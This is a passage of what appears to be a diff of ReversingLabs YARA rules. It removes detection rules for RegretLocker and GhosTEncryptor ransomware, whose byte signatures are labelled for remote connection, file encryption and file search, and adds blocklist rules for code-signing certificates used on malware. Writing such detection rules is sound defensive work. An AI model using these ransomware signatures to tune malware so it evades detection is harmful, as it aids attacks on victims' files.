-rule REVERSINGLABS_Win32_Ransomware_Regretlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RegretLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4e515cc-b0c2-57b2-a230-619ec01ac8d4"
-		date = "2021-04-02"
-		modified = "2021-04-02"
+		id = "218543f3-298f-5038-8fa9-3abeda9e4d8f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.RegretLocker.yara#L1-L206"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15332-L15348"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3927dfecacd74f60a169f82b68df5747daa90eaba77f24c5e730ce4c48d426a3"
+		logic_hash = "b348c502aeae036f6d17283260ed4479427f89c8c25f2b6d59e137e90694dbe4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RegretLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 8B 41 ?? 8B 55 ?? 3B C2 72 ?? 2B C2 56 8B 75 ?? 3B C6 0F 42 F0 83 79 ?? ??
-            72 ?? 8B 09 56 03 CA 51 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 5E 5D C2 ?? ?? E8 ??
-            ?? ?? ?? CC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 53
-            56 57 50 E8 ?? ?? ?? ?? 83 65 ?? ?? 50 E8 ?? ?? ?? ?? 83 4D ?? ?? 8A D8 59 59 8D 4D
-            ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ??
-            C7 45 ?? ?? ?? ?? ?? 8B CC 6A ?? 83 61 ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88
-            19 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8B 8D ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 6A ?? 5B 3B CB C6 45 ?? ?? 0F 43 C2 80 78 ??
-            ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ??
-            0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB
-            8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 84
-        }
-		$remote_connection_p2 = {
-            8D 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 84 C0 75 ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 3B FB 8D B5 ?? ?? ?? ?? 8B 9D
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F 43 C3 83 FF ?? 0F 43 F3 0F 43 D3 33 C9 8A 40 ?? 3A
-            46 ?? 0F BE 42 ?? 0F 94 C1 3B C8 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ??
-            ?? 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? ?? 74 ?? 32 DB EB ?? B3 ?? F6
-            45 ?? ?? 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5F 6A ?? 33 DB 89 BD
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? ?? ??
-            88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B B5 ?? ?? ?? ?? C6 45 ?? ?? 83 FE ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 84 C0 74 ?? 6A ?? 5E 83 EC ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ??
-            ?? ?? 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ??
-            89 59 ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-        }
-		$remote_connection_p3 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 83 EE ?? 75 ?? 8B B5 ?? ?? ?? ?? 8D 46 ?? 83 F8 ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 59 59 89 5D ?? 89 7D ?? 88 9D ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89
-            5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 8B
-            F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ??
-            ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ??
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45
-        }
-		$remote_connection_p4 = {
-            89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 8D 45 ?? 89 4D ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 6A
-            ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? C6 45
-            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 43 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 50 53 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 8B 75 ?? 0F 43 85 ?? ??
-            ?? ?? 6A ?? 6A ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 40 8D 8D ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? ?? ?? 59 53 FF 75 ?? 8D 8D ?? ?? ?? ?? A3 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 1C 01 E8 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 59 8B 75 ??
-            8D 4D ?? C6 45 ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? 89 70 ?? 8B 45 ??
-            89 30 8B 45 ?? 89 70 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 58 50 68 ?? ?? ?? ?? 83 EC ?? 89
-        }
-		$remote_connection_p5 = {
-            5D ?? 8B CC FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B F8 6A ?? 58
-            FF 35 ?? ?? ?? ?? 85 FF 0F 44 F8 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 5E 6A ?? 68
-            ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ??
-            C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8
-            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 8D 4D ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50
-            8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 50 83 C1 ?? E8 ?? ??
-            ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ??
-            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ??
-            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7
-            45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B F0 6A ?? 58 6A ?? 5F 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? 88 45 ?? 89 5D ?? 89 7D ??
-            88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ??
-            8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? 89 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
-            EC ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? 88 19 E8
-        }
-		$encrypt_files_p1 = {
-            8B FB 89 5D ?? 89 7D ?? 89 5D ?? 8B 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 89
-            45 ?? 3B F0 74 ?? 56 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ??
-            8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D
-            4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 6A
-            ?? 58 03 F0 3B 75 ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8B B5 ?? ?? ?? ??
-            C6 45 ?? ?? 8B 06 89 45 ?? EB ?? 8D 48 ?? 8D 41 ?? 50 51 68 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ??
-            ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ??
-            ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 3B C6 75 ?? 8B 75
-            ?? EB ?? 83 7E ?? ?? 74 ?? 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 75 ?? 0F 57 C0 68 ??
-            ?? ?? ?? 66 0F 13 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 6A ?? 59 99
-            F7 F9 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8B
-            75 ?? 8B 7D ?? 89 45 ?? 3B D8 74 ?? 83 EC ?? 8B CC 53 83 61 ?? ?? 83 61 ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 03 F8 83 D6 ?? 6A ?? 58 03 D8 3B 5D ?? 75 ?? 0F AC
-            F7 ?? C1 EE ?? 56 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 8B 35
-            ?? ?? ?? ?? EB ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 6A ?? 58 03 F0 3B F7 75 ?? 68 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p2 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 8D 8D ?? ?? ?? ?? 57
-            56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 33 DB 50 8D 45 ?? 89 5D ?? 50 E8 ?? ?? ?? ?? 59
-            59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 6A ?? 89 59 ?? C7 41
-            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? 8A D8 E8 ?? ?? ?? ?? 84 DB 74 ?? 33 DB E9 ??
-            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85
-            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ??
-            ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 33 DB 8B CC 89 5D ?? 56 E8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 3B C1 0F 42 C8 3B C7 89
-            4D ?? 0F 42 F8 89 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 9D ?? ?? ?? ?? 75 ?? 83 EC ?? 8B CC 56 E8 ?? ?? ??
-            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? C6 45 ?? ?? 72 ?? 8B 36 E8
-            ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 77 ?? 56 E8 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ??
-            ?? 8B 4D ?? 56 53 51 89 45 ?? E8 ?? ?? ?? ?? 56 53 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            83 C4 ?? 89 5D ?? 8B D3 85 C0 0F 84 ?? ?? ?? ?? 8B C8 2B CA 39 4D ?? 8B C1 8B F1 0F
-            46 45 ?? 3B F9 89 45 ?? 0F 46 F7 8B 7D ?? 2B CE 89 75 ?? 39 4D ?? 0F 46 4D ?? 89 4D
-            ?? 85 FF 75 ?? 53 56 FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 0C 3E 8B
-        }
-		$encrypt_files_p3 = {
-            C4 89 4D ?? 89 08 8D 8D ?? ?? ?? ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? E8
-            ?? ?? ?? ?? 53 FF 75 ?? 8D 8D ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 FF 75
-            ?? 8D 8D ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 8B D4 8B D8
-            33 C0 03 CF 89 0A 8D 8D ?? ?? ?? ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? E8
-            ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 7D ?? 2B 75 ?? 03
-            7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75
-            ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 01 45 ?? 53 E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 8B 84 05 ?? ?? ?? ?? C1 E8 ?? A8 ?? 74 ?? 83 EC ??
-            8B CC FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ??
-            C6 45 ?? ?? 72 ?? 8B 36 E8 ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 7D ??
-            89 55 ?? 6A ?? 5B 3B D0 0F 82 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ??
-            E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC
-            ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ??
-            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 8B 48 ?? C6 45 ?? ?? 72 ??
-            8B 00 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
-            8D 45 ?? 0F 43 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 89 59 ??
-            89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? B3 ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 8A D8 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 8A C3 5F 5E 64 89 0D ?? ?? ?? ?? 5B C9 C3
-        }
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
-            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
-            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
-            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
-            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
-            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
-            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
-            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
-            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
-            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMS INTERACTIVE MEDIA SOLUTIONS" and pe.signatures [ i ] . serial == "22:ac:ca:d2:35:fb:1a:c7:42:2e:be:5e:a7:ac:9b:c5" and 1019001600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e1834597-4e45-5866-97f4-e00c79190930"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15350-L15366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "78ede4b02cb1b07500cd0c4f1f33da598938940d0f58430edda00d79b19b16a5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "4d:29:75:7c:4f:bf:c3:2b:97:09:1d:96:e3:72:30:02" and 1474848000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostencryptor : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GhosTEncryptor ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9f035e39-e0fe-54f3-8206-08fbbd9206b4"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "6ea47017-1296-5409-8ff2-ef69434233ff"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara#L1-L69"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15368-L15384"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "85c1f6e5acf746388b0a9ddeb1f0ad1d2219fff7358c9a981849863155c13e3c"
+		logic_hash = "88c63a921a300e1b985d084c3ab1a2485713b4c674dafd419d092e5562f121d7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GhosTEncryptor"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_folders = {
-            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ??
-            07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ??
